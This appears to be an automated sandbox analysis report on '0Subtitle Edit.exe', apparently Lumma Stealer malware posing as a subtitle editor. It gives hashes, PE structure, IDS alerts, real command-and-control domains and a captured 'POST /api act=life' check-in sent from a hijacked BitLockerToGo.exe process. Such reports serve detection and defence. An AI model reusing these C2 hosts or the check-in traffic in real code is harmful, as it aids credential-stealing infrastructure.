	https://piclut.com/n/?c3Y9bzM2NV8xX29uZSZyYW5kPWNrcHVSM2s9JnVpZD1VU0VSMjkwNzIwMjRVMTgwNzI5MDA=	Get hash	malicious	Unknown	Browse	104.21.92.125
	file.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	file.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	http://control.frilix.com/grace/fxc/aW5mby5jcmVkaXRldXJlbkBicmVkYS5ubA==	Get hash	malicious	HTMLPhisher	Browse	104.18.95.41
	https://tmx.velsol.com/Reporting/Document.aspx?MasterAgreementID=i1339-005394573&ID=aQAxADMAMwA5AC0AMAAwADUAMwA5ADQANQA3ADMA.	Get hash	malicious	Unknown	Browse	104.17.24.14
	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	https://tmx.velsol.com/Reporting/Document.aspx?MasterAgreementID=i1339-005394573&ID=aQAxADMAMwA5AC0AMAAwADUAMwA5ADQANQA3ADMA.	Get hash	malicious	Unknown	Browse	104.17.24.14
	https://sesh-gangrene.shop/	Get hash	malicious	HTMLPhisher	Browse	104.18.95.41
	http://www.bambooalgarve.com	Get hash	malicious	Unknown	Browse	104.17.25.14

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Setup-Premium.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Setup-Premium.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	iBO7gzlZr3.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	d3d9x.dll	Get hash	malicious	LummaC	Browse	188.114.96.3
	Scanned Document.exe	Get hash	malicious	DBatLoader, FormBook	Browse	188.114.96.3

Dropped Files

⊘No context

Created / dropped Files

⊘No created / dropped files found

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.977148795110524
TrID:	Win32 Executable (generic) a (10002005/4) 99.53% InstallShield setup (43055/19) 0.43% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	0Subtitle Edit.exe
File size:	18'028'032 bytes
MD5:	c304e6d97f3a59f101484c104132c434
SHA1:	02eefa0d5e5578406c37d9088be34c844349df01
SHA256:	2380b9a91c92ba2ab097f7237294d9235970ea3054bd16c7b5aabcbec9c44322
SHA512:	14c239ecf12941dcef6f0ab7e955c942061310dd38b3979fc98a6f76c23c81014d337970c8b4d0ed062fb869fabbf55555a39a8506e66de78502d1b1c41f9394
SSDEEP:	98304:apXjB+jkboS06BrHkB1IuCg8CgEkUa9VCzk1K4Yjghio6cWE79DTHA5UiuHRClbm:WQyI3INCgzVCNUhp79o2RClbvO
TLSH:	14072851FE9B44F5D9438871845BB27F13348D058B29CB8BEB45BA2AF8377915C3B20A
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........*...............Py..^.......r............@.................................:.....@................................

File Icon


Icon Hash:	0c0c2d33ceec80aa

Static PE Info

General

Entrypoint:	0x4772f0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	1
File Version Major:	6
File Version Minor:	1
Subsystem Version Major:	6
Subsystem Version Minor:	1
Import Hash:	1aae8bf580c846f39c71c05898e57e88

Entrypoint Preview

Instruction
jmp 00007F52C907B490h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
sub esp, 28h
mov dword ptr [esp+1Ch], ebx
mov dword ptr [esp+10h], ebp
mov dword ptr [esp+14h], esi
mov dword ptr [esp+18h], edi
mov dword ptr [esp], eax
mov dword ptr [esp+04h], ecx
call 00007F52C9056696h
mov eax, dword ptr [esp+08h]
mov edi, dword ptr [esp+18h]
mov esi, dword ptr [esp+14h]
mov ebp, dword ptr [esp+10h]
mov ebx, dword ptr [esp+1Ch]
add esp, 28h
retn 0004h
ret
int3
int3
int3
int3
int3
int3
sub esp, 08h
mov ecx, dword ptr [esp+0Ch]
mov edx, dword ptr [ecx]
mov eax, esp
mov dword ptr [edx+04h], eax
sub eax, 00010000h
mov dword ptr [edx], eax
add eax, 00000BA0h
mov dword ptr [edx+08h], eax
mov dword ptr [edx+0Ch], eax
lea edi, dword ptr [ecx+34h]
mov dword ptr [edx+18h], ecx
mov dword ptr [edi], edx
mov dword ptr [esp+04h], edi
call 00007F52C907D904h
cld
call 00007F52C907C97Eh
call 00007F52C907B5B9h
add esp, 08h
ret
jmp 00007F52C907D7B0h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov ebx, dword ptr [esp+04h]
mov ebp, esp
mov dword ptr fs:[00000034h], 00000000h
mov ecx, dword ptr [ebx+04h]
cmp ecx, 00000000h
je 00007F52C907D7B1h
mov eax, ecx
shl eax, 02h
sub esp, eax
mov edi, esp
mov esi, dword ptr [ebx+08h]
cld
rep movsd

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x10ef000	0x44c	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x115d000	0xe8f4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x10f0000	0x6bb08	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1041ae0	0xb4	.data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x794e28	0x795000	7abb70141b8ce382098157ee1cba1978	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x796000	0x8a9ea4	0x8aa000	fef4fdeca42d4488434e0dcf81162eb7	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1040000	0xaedac	0x77400	9143fdee4fe14c54c687842bb1e8ea17	False	0.344851447851153	data	5.4176502281358605	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x10ef000	0x44c	0x600	ea090bf510810cfc73e0f1331dd2cabe	False	0.3606770833333333	OpenPGP Public Key	4.033296473966784	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x10f0000	0x6bb08	0x6bc00	803d89346d3923b33030cf935c41faf3	False	0.5555485063805105	data	6.662437121700121	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.symtab	0x115c000	0x4	0x200	07b5472d347d42780469fb2654b7fc54	False	0.02734375	data	0.020393135236084953	IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0x115d000	0xe8f4	0xea00	0f180081ea106a63d468c6a161416d74	False	0.16528111645299146	data	3.5046136969334065	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x115d384	0xa68	Device independent bitmap graphic, 64 x 128 x 4, image size 2048	English	United States	0.1174924924924925
RT_ICON	0x115ddec	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	United States	0.15792682926829268
RT_ICON	0x115e454	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States	0.23387096774193547
RT_ICON	0x115e73c	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	United States	0.39864864864864863
RT_ICON	0x115e864	0x1628	Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colors	English	United States	0.08339210155148095
RT_ICON	0x115fe8c	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.1023454157782516
RT_ICON	0x1160d34	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.10649819494584838
RT_ICON	0x11615dc	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.10838150289017341
RT_ICON	0x1161b44	0x12e5	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.8712011577424024
RT_ICON	0x1162e2c	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.05668398677373642
RT_ICON	0x1167054	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.08475103734439834
RT_ICON	0x11695fc	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.09920262664165103
RT_ICON	0x116a6a4	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.2047872340425532
RT_GROUP_ICON	0x116ab0c	0xbc	data	English	United States	0.6170212765957447
RT_VERSION	0x116abc8	0x584	data	English	United States	0.29178470254957506
RT_MANIFEST	0x116b14c	0x7a8	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3377551020408163

Imports

DLL

Import

kernel32.dll

WriteFile, WriteConsoleW, WerSetFlags, WerGetFlags, WaitForMultipleObjects, WaitForSingleObject, VirtualQuery, VirtualFree, VirtualAlloc, TlsAlloc, SwitchToThread, SuspendThread, SetWaitableTimer, SetUnhandledExceptionFilter, SetProcessPriorityBoost, SetEvent, SetErrorMode, SetConsoleCtrlHandler, ResumeThread, RaiseFailFastException, PostQueuedCompletionStatus, LoadLibraryW, LoadLibraryExW, SetThreadContext, GetThreadContext, GetSystemInfo, GetSystemDirectoryA, GetStdHandle, GetQueuedCompletionStatusEx, GetProcessAffinityMask, GetProcAddress, GetErrorMode, GetEnvironmentStringsW, GetCurrentThreadId, GetConsoleMode, FreeEnvironmentStringsW, ExitProcess, DuplicateHandle, CreateWaitableTimerExW, CreateThread, CreateIoCompletionPort, CreateEventA, CloseHandle, AddVectoredExceptionHandler

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-08-29T15:40:23.745299+0200	TCP	2055493	ET MALWARE Lumma Stealer Domain in TLS SNI (traineiwnqo .shop)	1	49716	443	192.168.2.6	188.114.96.3
2024-08-29T15:40:23.086805+0200	TCP	2055493	ET MALWARE Lumma Stealer Domain in TLS SNI (traineiwnqo .shop)	1	49715	443	192.168.2.6	188.114.96.3
2024-08-29T15:40:22.581381+0200	UDP	2055483	ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop)	1	49209	53	192.168.2.6	1.1.1.1
2024-08-29T15:40:23.232493+0200	TCP	2049836	ET MALWARE Lumma Stealer Related Activity	1	49715	443	192.168.2.6	188.114.96.3
2024-08-29T15:40:23.232493+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	49715	443	192.168.2.6	188.114.96.3
2024-08-29T15:40:24.347073+0200	TCP	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	49716	443	192.168.2.6	188.114.96.3
2024-08-29T15:40:24.347073+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	49716	443	192.168.2.6	188.114.96.3
2024-08-29T15:40:22.112500+0200	TCP	2055489	ET MALWARE Lumma Stealer Domain in TLS SNI (locatedblsoqp .shop)	1	49714	443	192.168.2.6	188.114.96.3
2024-08-29T15:40:22.563426+0200	TCP	2049836	ET MALWARE Lumma Stealer Related Activity	1	49714	443	192.168.2.6	188.114.96.3
2024-08-29T15:40:22.563426+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	49714	443	192.168.2.6	188.114.96.3
2024-08-29T15:40:21.613730+0200	UDP	2055479	ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop)	1	50099	53	192.168.2.6	1.1.1.1
2024-08-29T15:40:21.491116+0200	TCP	2049836	ET MALWARE Lumma Stealer Related Activity	1	49713	443	192.168.2.6	188.114.96.3
2024-08-29T15:40:21.491116+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	49713	443	192.168.2.6	188.114.96.3

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 29, 2024 15:40:20.518735886 CEST	49713	443	192.168.2.6	188.114.96.3
Aug 29, 2024 15:40:20.518781900 CEST	443	49713	188.114.96.3	192.168.2.6
Aug 29, 2024 15:40:20.518855095 CEST	49713	443	192.168.2.6	188.114.96.3
Aug 29, 2024 15:40:20.521859884 CEST	49713	443	192.168.2.6	188.114.96.3
Aug 29, 2024 15:40:20.521873951 CEST	443	49713	188.114.96.3	192.168.2.6
Aug 29, 2024 15:40:20.986238003 CEST	443	49713	188.114.96.3	192.168.2.6
Aug 29, 2024 15:40:20.986397028 CEST	49713	443	192.168.2.6	188.114.96.3
Aug 29, 2024 15:40:20.988801003 CEST	49713	443	192.168.2.6	188.114.96.3
Aug 29, 2024 15:40:20.988809109 CEST	443	49713	188.114.96.3	192.168.2.6
Aug 29, 2024 15:40:20.989064932 CEST	443	49713	188.114.96.3	192.168.2.6
Aug 29, 2024 15:40:21.040318966 CEST	49713	443	192.168.2.6	188.114.96.3
Aug 29, 2024 15:40:21.046236992 CEST	49713	443	192.168.2.6	188.114.96.3
Aug 29, 2024 15:40:21.046252012 CEST	49713	443	192.168.2.6	188.114.96.3
Aug 29, 2024 15:40:21.046330929 CEST	443	49713	188.114.96.3	192.168.2.6
Aug 29, 2024 15:40:21.491127014 CEST	443	49713	188.114.96.3	192.168.2.6
Aug 29, 2024 15:40:21.491224051 CEST	443	49713	188.114.96.3	192.168.2.6
Aug 29, 2024 15:40:21.491286039 CEST	49713	443	192.168.2.6	188.114.96.3
Aug 29, 2024 15:40:21.596427917 CEST	49713	443	192.168.2.6	188.114.96.3
Aug 29, 2024 15:40:21.596445084 CEST	443	49713	188.114.96.3	192.168.2.6
Aug 29, 2024 15:40:21.630716085 CEST	49714	443	192.168.2.6	188.114.96.3
Aug 29, 2024 15:40:21.630738974 CEST	443	49714	188.114.96.3	192.168.2.6
Aug 29, 2024 15:40:21.630800009 CEST	49714	443	192.168.2.6	188.114.96.3
Aug 29, 2024 15:40:21.631314993 CEST	49714	443	192.168.2.6	188.114.96.3
Aug 29, 2024 15:40:21.631326914 CEST	443	49714	188.114.96.3	192.168.2.6
Aug 29, 2024 15:40:22.112369061 CEST	443	49714	188.114.96.3	192.168.2.6
Aug 29, 2024 15:40:22.112499952 CEST	49714	443	192.168.2.6	188.114.96.3
Aug 29, 2024 15:40:22.114232063 CEST	49714	443	192.168.2.6	188.114.96.3
Aug 29, 2024 15:40:22.114242077 CEST	443	49714	188.114.96.3	192.168.2.6
Aug 29, 2024 15:40:22.114475965 CEST	443	49714	188.114.96.3	192.168.2.6
Aug 29, 2024 15:40:22.115976095 CEST	49714	443	192.168.2.6	188.114.96.3
Aug 29, 2024 15:40:22.116008997 CEST	49714	443	192.168.2.6	188.114.96.3
Aug 29, 2024 15:40:22.116049051 CEST	443	49714	188.114.96.3	192.168.2.6
Aug 29, 2024 15:40:22.563436031 CEST	443	49714	188.114.96.3	192.168.2.6
Aug 29, 2024 15:40:22.563541889 CEST	443	49714	188.114.96.3	192.168.2.6
Aug 29, 2024 15:40:22.563585043 CEST	49714	443	192.168.2.6	188.114.96.3
Aug 29, 2024 15:40:22.563781023 CEST	49714	443	192.168.2.6	188.114.96.3
Aug 29, 2024 15:40:22.563802004 CEST	443	49714	188.114.96.3	192.168.2.6
Aug 29, 2024 15:40:22.563813925 CEST	49714	443	192.168.2.6	188.114.96.3
Aug 29, 2024 15:40:22.563818932 CEST	443	49714	188.114.96.3	192.168.2.6
Aug 29, 2024 15:40:22.593842983 CEST	49715	443	192.168.2.6	188.114.96.3
Aug 29, 2024 15:40:22.593884945 CEST	443	49715	188.114.96.3	192.168.2.6
Aug 29, 2024 15:40:22.593965054 CEST	49715	443	192.168.2.6	188.114.96.3
Aug 29, 2024 15:40:22.594377041 CEST	49715	443	192.168.2.6	188.114.96.3
Aug 29, 2024 15:40:22.594387054 CEST	443	49715	188.114.96.3	192.168.2.6
Aug 29, 2024 15:40:23.086747885 CEST	443	49715	188.114.96.3	192.168.2.6
Aug 29, 2024 15:40:23.086805105 CEST	49715	443	192.168.2.6	188.114.96.3
Aug 29, 2024 15:40:23.088407993 CEST	49715	443	192.168.2.6	188.114.96.3
Aug 29, 2024 15:40:23.088418007 CEST	443	49715	188.114.96.3	192.168.2.6
Aug 29, 2024 15:40:23.088666916 CEST	443	49715	188.114.96.3	192.168.2.6
Aug 29, 2024 15:40:23.090204954 CEST	49715	443	192.168.2.6	188.114.96.3
Aug 29, 2024 15:40:23.090220928 CEST	49715	443	192.168.2.6	188.114.96.3
Aug 29, 2024 15:40:23.090267897 CEST	443	49715	188.114.96.3	192.168.2.6
Aug 29, 2024 15:40:23.232522964 CEST	443	49715	188.114.96.3	192.168.2.6
Aug 29, 2024 15:40:23.232574940 CEST	443	49715	188.114.96.3	192.168.2.6
Aug 29, 2024 15:40:23.232614994 CEST	443	49715	188.114.96.3	192.168.2.6
Aug 29, 2024 15:40:23.232639074 CEST	49715	443	192.168.2.6	188.114.96.3
Aug 29, 2024 15:40:23.232656002 CEST	443	49715	188.114.96.3	192.168.2.6
Aug 29, 2024 15:40:23.232736111 CEST	443	49715	188.114.96.3	192.168.2.6
Aug 29, 2024 15:40:23.232805014 CEST	49715	443	192.168.2.6	188.114.96.3
Aug 29, 2024 15:40:23.239969969 CEST	49715	443	192.168.2.6	188.114.96.3
Aug 29, 2024 15:40:23.239991903 CEST	443	49715	188.114.96.3	192.168.2.6
Aug 29, 2024 15:40:23.240041971 CEST	49715	443	192.168.2.6	188.114.96.3
Aug 29, 2024 15:40:23.240048885 CEST	443	49715	188.114.96.3	192.168.2.6
Aug 29, 2024 15:40:23.259490967 CEST	49716	443	192.168.2.6	188.114.96.3
Aug 29, 2024 15:40:23.259521961 CEST	443	49716	188.114.96.3	192.168.2.6
Aug 29, 2024 15:40:23.259594917 CEST	49716	443	192.168.2.6	188.114.96.3
Aug 29, 2024 15:40:23.259865999 CEST	49716	443	192.168.2.6	188.114.96.3
Aug 29, 2024 15:40:23.259876966 CEST	443	49716	188.114.96.3	192.168.2.6
Aug 29, 2024 15:40:23.745207071 CEST	443	49716	188.114.96.3	192.168.2.6
Aug 29, 2024 15:40:23.745299101 CEST	49716	443	192.168.2.6	188.114.96.3
Aug 29, 2024 15:40:23.746922970 CEST	49716	443	192.168.2.6	188.114.96.3
Aug 29, 2024 15:40:23.746932983 CEST	443	49716	188.114.96.3	192.168.2.6
Aug 29, 2024 15:40:23.747168064 CEST	443	49716	188.114.96.3	192.168.2.6
Aug 29, 2024 15:40:23.748358011 CEST	49716	443	192.168.2.6	188.114.96.3
Aug 29, 2024 15:40:23.748502016 CEST	49716	443	192.168.2.6	188.114.96.3
Aug 29, 2024 15:40:23.748521090 CEST	443	49716	188.114.96.3	192.168.2.6
Aug 29, 2024 15:40:24.347090960 CEST	443	49716	188.114.96.3	192.168.2.6
Aug 29, 2024 15:40:24.347189903 CEST	443	49716	188.114.96.3	192.168.2.6
Aug 29, 2024 15:40:24.347469091 CEST	49716	443	192.168.2.6	188.114.96.3
Aug 29, 2024 15:40:24.347506046 CEST	49716	443	192.168.2.6	188.114.96.3
Aug 29, 2024 15:40:24.347521067 CEST	443	49716	188.114.96.3	192.168.2.6
Aug 29, 2024 15:40:24.347531080 CEST	49716	443	192.168.2.6	188.114.96.3
Aug 29, 2024 15:40:24.347537041 CEST	443	49716	188.114.96.3	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 29, 2024 15:40:20.499984026 CEST	61261	53	192.168.2.6	1.1.1.1
Aug 29, 2024 15:40:20.513205051 CEST	53	61261	1.1.1.1	192.168.2.6
Aug 29, 2024 15:40:21.613729954 CEST	50099	53	192.168.2.6	1.1.1.1
Aug 29, 2024 15:40:21.628468037 CEST	53	50099	1.1.1.1	192.168.2.6
Aug 29, 2024 15:40:22.581381083 CEST	49209	53	192.168.2.6	1.1.1.1
Aug 29, 2024 15:40:22.593060970 CEST	53	49209	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 29, 2024 15:40:20.499984026 CEST	192.168.2.6	1.1.1.1	0x2a55	Standard query (0)	separateedmsqj.shop	A (IP address)	IN (0x0001)	false
Aug 29, 2024 15:40:21.613729954 CEST	192.168.2.6	1.1.1.1	0x98ff	Standard query (0)	locatedblsoqp.shop	A (IP address)	IN (0x0001)	false
Aug 29, 2024 15:40:22.581381083 CEST	192.168.2.6	1.1.1.1	0xf75	Standard query (0)	traineiwnqo.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Aug 29, 2024 15:40:20.513205051 CEST	1.1.1.1	192.168.2.6	0x2a55	No error (0)	separateedmsqj.shop	188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 29, 2024 15:40:20.513205051 CEST	1.1.1.1	192.168.2.6	0x2a55	No error (0)	separateedmsqj.shop	188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 29, 2024 15:40:21.628468037 CEST	1.1.1.1	192.168.2.6	0x98ff	No error (0)	locatedblsoqp.shop	188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 29, 2024 15:40:21.628468037 CEST	1.1.1.1	192.168.2.6	0x98ff	No error (0)	locatedblsoqp.shop	188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 29, 2024 15:40:22.593060970 CEST	1.1.1.1	192.168.2.6	0xf75	No error (0)	traineiwnqo.shop	188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 29, 2024 15:40:22.593060970 CEST	1.1.1.1	192.168.2.6	0xf75	No error (0)	traineiwnqo.shop	188.114.97.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

separateedmsqj.shop

locatedblsoqp.shop

traineiwnqo.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49713	188.114.96.3	443	3992	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-29 13:40:21 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: separateedmsqj.shop
2024-08-29 13:40:21 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-08-29 13:40:21 UTC	804	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 13:40:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=16s8u6unhcnknlsd341318it5l; expires=Mon, 23-Dec-2024 07:27:00 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AZ1D%2B4elCA0C8cKRCwxuSpH2cuWkNa5issnBtLpexkPWcdF1B%2BLY6Vg9RxYJeBH%2Fha2RlkEdWzx%2FkagiS2mcNWAFq1J0kiAPjr5Mc2rW%2BPOz40nLZrG3IMxgOdK9rzVXPanOi9NP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bacf3cfdad70cc1-EWR alt-svc: h3=":443"; ma=86400
2024-08-29 13:40:21 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-08-29 13:40:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49714	188.114.96.3	443	3992	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-29 13:40:22 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: locatedblsoqp.shop
2024-08-29 13:40:22 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-08-29 13:40:22 UTC	802	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 13:40:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=kev7t727ht0v3fed7421nvhd4t; expires=Mon, 23-Dec-2024 07:27:01 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FyjcpYDl%2FHrQl10UcCznL%2FEPL8GoFNapHYPHbHqjdwiA6qMJWqolLPjDlDeOrbKKDfuMJRzykKyvv4a%2BH8B9bCTxfSgGBBnft3rId3aOAXc4dYXXuuc2LG7UHNcHhA6h8ST2E4E%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bacf3d69a5fc413-EWR alt-svc: h3=":443"; ma=86400
2024-08-29 13:40:22 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-08-29 13:40:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.6	49715	188.114.96.3	443	3992	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-29 13:40:23 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: traineiwnqo.shop
2024-08-29 13:40:23 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-08-29 13:40:23 UTC	545	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 13:40:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FvWeiBinCU86KQMv6434oFhK9INsfoK8p6MHdQrzqPSkWirLvLByLXoy%2FeyYQgBpk%2BWFAVowgzIeIWAC7EIYIw4%2FKBM9wuBrk4N1sHUScf8MRuQRCyXfa2iYiHYXpz37Bs9C"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bacf3dcdeed4387-EWR
